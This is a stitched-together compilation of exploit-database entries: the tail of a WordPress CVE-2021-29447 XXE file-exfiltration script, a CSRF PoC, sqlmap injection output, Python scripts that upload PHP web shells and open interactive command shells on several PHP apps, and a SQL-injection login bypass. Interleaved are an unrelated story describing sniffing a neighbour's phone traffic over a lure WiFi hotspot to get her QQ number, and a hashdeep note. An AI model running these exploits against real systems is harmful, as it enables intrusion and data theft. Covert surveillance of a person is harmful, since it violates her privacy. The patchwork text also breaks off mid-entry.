                echo "[!] File does not exist or is not allowed to be read."
            fi
            break
        fi
    done
}

# Cleanup
cleanup(){
    kill $(cat http.server.pid) &>/dev/null
    rm http.server.log http.server.pid &>/dev/null
    rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}

# Execute
logoType

# Checking parameters
if [[ $# -ne 5 ]];then
    echo "[!] Parameters are missing!!!"
    echo ""
    echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
else
    # Test Connection...
    echo "[*] Test connection to WordPress..."
    # WP Auth
    # Only the HTTP status of the login response is inspected (302 = success);
    # the captured headers in .cookies.tmp are not reused afterwards.
    authCheck=$(curl -i -s -k -X $'POST' \
        -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
        -b $'wordpress_test_cookie=WP%20Cookie%20check' \
        --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
        "http://$rHost/wp-login.php" > .cookies.tmp)
    auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')
    # Running authentication with WordPress.
    if [[ $auth != "302" ]]; then
        echo "[-] Authentication failed ! Check username and password"
    else
        echo "[+] Authentication successfull!!!"
        # Create wav & dtd file
        wavCreate
        dtdCreate
        serverSniffer
        loadFile
        cleanup
    fi
fi
  7. # Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux (2021.4) / xammp # Category: WebApp # Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'" # Date: 2021-08-15 ######## Description ######## # # An attacker can change the admin's account information because the update request carries no anti-CSRF token. # # ######## Proof of Concept ######## POST /srv/service/admin/updateuserinfo HTTP/1.1 Host: localhost Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: http://localhost Referer: http://localhost/Y/ Te: trailers Connection: close firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595 ####### EXPLOIT ################## <html> <body> <script>history.pushState('', '', '/')</script> <form action="victimsite.com/srv/service/admin/updateuserinfo" method="POST"> <input type="hidden" name="firstName" value="[CHANGEHERE]" /> <input type="hidden" name="lastName" value="[CHANGEHERE]" /> <input type="hidden" name="email" value="[CHANGEHERE]" /> <input type="hidden" name="phone" value="[CHANGEHERE]" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  8. # Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) # Exploit Author: Erwin Krazek (Nero) # Date: 17/09/2021 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Vendor: oretnom23 # Version: v1.0 # Tested on: Linux, Apache, Mysql # Exploit Description: Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack. # Vulnerable Code In search.php on line 28 $count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows; Sqlmap command: sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch Output: --- Parameter: search (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - --- [17:33:38] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.46, 
PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:33:38] [INFO] fetching database names available databases [4]: [*] church_db [*] information_schema [*] mysql [*] performance_schema
  9. There are a few remaining lamps, and the night is thick. I walked on an unknown small road in the city, complaining about the depression brought to me by work. Looking at the shy wallet and the confused way forward. I fell into deep thought. Today is another day of overtime. New projects are about to be launched, but bugs are emerging one after another, so I can only work overtime to this point. At this time, my wife probably all went to bed. I came downstairs to the apartment I rented. The small apartment I rented was a two-story building with the landlord living downstairs, and there were two rooms upstairs. Previously, the room was accompanied by adults, and the child moved out after graduation. There is a small courtyard on the second floor, which is why I rented it. Sitting in the yard in summer, looking up at the starry sky, it’s so beautiful! As soon as I went upstairs, I found that the light next door was on. This is all the point, where do you come from? It's probably a new one. I didn't care, I went to bed just after being tired for a day. I wake up late every day, but I wake up particularly early today. Because I seemed to hear a woman talking in my dream. And it's a very magnetic sound. For a single dog like me, it is hard to come by! Because I am introverted and shy, I still have no girlfriend. And I seemed to see spring. When I was at work, I met the landlord and mentioned this matter by the way. From the landlord, I learned that I had just moved here yesterday and seemed to be working in an administrative unit. It was a once-in-a-lifetime opportunity for me, and a new plan lingers in my mind all day. Information Collection Target: Collect QQ *bao Xinshou* number and other related information. Blocking bricks and attracting jade How to obtain the above information of the target? Some friends say it’s very simple? Just ask, but for people like us who are introverted. This is an insurmountable hurdle. So how to do it? 
Although it is 5G now, the expensive costs make workers still like to take advantage of WIFI. She just moved here, and the first thing she did was to see if there was any useful WiFi. So I turned on the router's guest network, without encryption. The purpose is to make it quickly take the bait. But some have some concerns due to free hotspots. It can also be set to encrypt WiFi and then share the password through the WiFi master key. Working servo After starting my plan, I get off work very early every day. The purpose is to get useful information early. Finally, God pays off and sees a strange device online. You can see that an OPPO-Reno6-Pro-5G has been quietly launched. Unexpected Because it was night, the other party’s mobile phone must be using it. So our mobile phone data was used to capture packets. tcpdump -i br0 host 192.168.123.90 -w 14235.cap After waiting for a while, we analyze the captured data packets Download the data packet and open it with Wireshark Find QQ Press ctrl+f to search hexadecimal 00 00 00 0d Confirm number Hand* A certain bao wei xin At this point, the basic information is collected. Next is a long road. (There are many ten thousand words omitted here) Declaration The above content is only experimental data, please do not take it seriously. Please do not illegally and maliciously attack others, please do not use them illegally!
  10. # Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access 'admin/ajax.php', as it does not check for an authenticated user session. # 2. Set the 'action' parameter of the POST request to 'save_settings'. # - `ajax.php?action=save_settings` # 3. Capture the request in Burp and replace it with the following request.
''' POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 Content-Length: 754 Origin: http://localhost Connection: close Referer: http://localhost/fos/admin/index.php?page=site_settings Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="name" adsa -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="email" asdsad@asda.com -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="contact" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="about" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo();?> -----------------------------120025571041714278883588636251-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests. 
# RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Food Ordering System v2.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/assets/img/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] 
"+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  11. # Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 
'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  12. When we download files from the Internet, we often see that the author attaches the program's MD5 value. The purpose is to let users compare it with the MD5 value of the downloaded file. If the MD5 value of the file you download does not match the one the original author provided, the file has been modified by someone else. If it is a program, someone may have added a malicious backdoor. Note that a matching hash only proves integrity relative to the published value: MD5 is collision-prone, and an attacker who can replace the download can usually also replace the hash published next to it, so prefer SHA-256 and a hash (or signature) obtained from a separate, trusted channel. hashdeep computes multiple hashes or message digests for any number of files. It can also walk the directory structure recursively. By default, the program calculates MD5 and SHA-256 hashes, equivalent to -c md5,sha256. It can also audit a set of files against a known hash list. Errors are reported on standard error. If no files are specified, it reads from standard input. Usage: hashdeep <file name> After modifying the file, look at the MD5 value again. It can be seen that the values change from b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239 to 02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 Other parameters -c: Mode. Use the specified algorithm(s) to calculate the hash of the file. Supports md5, sha1, sha256, tiger and whirlpool. -r: Enable recursive mode. Iterates through all subdirectories. Note that recursive mode cannot be used to check only the files with a given file extension: for example, calling hashdeep -r *.txt will check all files in directories whose names end in .txt. -v: Enable verbose mode. Use it again to make the program more verbose.
  13. # Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) # Date: 18-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://websitebaker.org/ # Software Link: http://wiki.websitebaker.org/doku.php/en/downloads # Version: 2.13.0 # Category: Webapps # Tested on: Linux/Windows # WebsiteBaker Open Source Content Management # Includes an endpoint that allows remote access # Language page misconfigured, causing vulnerability # User information with sufficient permissions is required. # I had to write a long script to bypass some security measures. # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") sleep(2) find_default(args) def find_default(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] 
Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!\n") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable!\n") sleep(2) exit(1) exploit(args) url = args.host + "/admin/login/index.php" headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/addons/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers) for cookie in response.cookies: phpsessid_name = cookie.name soup = BeautifulSoup(response.text, 'html.parser') input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value")) input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value")) input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name")) input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value")) login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value) def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value): session = requests.session() url = args.host + "/admin/login/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/login/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "url": '', "username_fieldname": input_hidden_username, "password_fieldname": input_hidden_password, input_hidden_name: input_hidden_value, input_hidden_username : args.login, input_hidden_password : args.password, "submit": '' } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookie = (response.cookies.get(phpsessid_name)) if response.headers.get("Location") == args.host + "/admin/start/index.php": print("[+] Success Login...\n") sleep(2) check_pers(args, phpsessid_name, new_cookie) else: print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) def check_pers(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"): find_token(args, phpsessid_name, new_cookie) else: print("[!] 
Unauthorized user!\n\n") print("Requires user with language editing permissions.") sleep(2) exit(1) def find_token(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') token_hidden_name = soup.find_all("input", type="hidden")[5].get("name") token_hidden_value = soup.find_all("input", type="hidden")[5].get("value") if soup.find_all("option")[1].text == "": exploit(args) elif soup.find_all("option")[20].text == "Türkçe": token_lang = soup.find_all("option")[20].get("value") uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang) else: install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value) pass def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + 
"/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') # print(soup.find_all("div", class_="w3-text-grey w3--medium")) print("[!] 
Installing Vuln Lang File!\n") sleep(2) find_token(args, phpsessid_name, new_cookie) def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang): url = args.host + "/admin/languages/uninstall.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "action": "uninstall", "advanced": '', token_hidden_name : token_hidden_value, "file": token_lang, "submit": "Uninstall" } response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') print("[!] Uninstall Lang File!\n") # print(soup.find_all("div", class_="w3-text-grey w3--medium")) sleep(2) find_token(args, phpsessid_name, new_cookie) def exploit(args): response = requests.get(args.host + "/languages/TR.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/languages/TR.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  14. # Exploit Title: Budget and Expense Tracker System 1.0 - Authentication Bypass # Exploit Author: Prunier Charles-Yves # Date: September 20, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Budget and Expense Tracker System 1.0 is prone to an easy authentication bypass vulnerability allowing an attacker to log in with the admin account. The bypass is a SQL injection in the login query (the username is concatenated into the SQL string); the fix is to use prepared statements with bound parameters for the username and password. ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/expense_budget/admin/login.php Username: admin' or ''=' --
  15. # Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # The root cause is twofold: 'classes/Users.php' does not require an authenticated session, and the upload handler keeps the client-supplied file name and extension; the fix is to enforce the session check before handling 'f=save' and to accept only a server-side allow-list of image extensions and content types, storing uploads under a server-generated name. # Exploit Details: # 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. # 2. Set the 'f' parameter of the POST request to 'save'. # - `Users.php?f=save` # 3. Capture the request in Burp and replace it with the following request. 
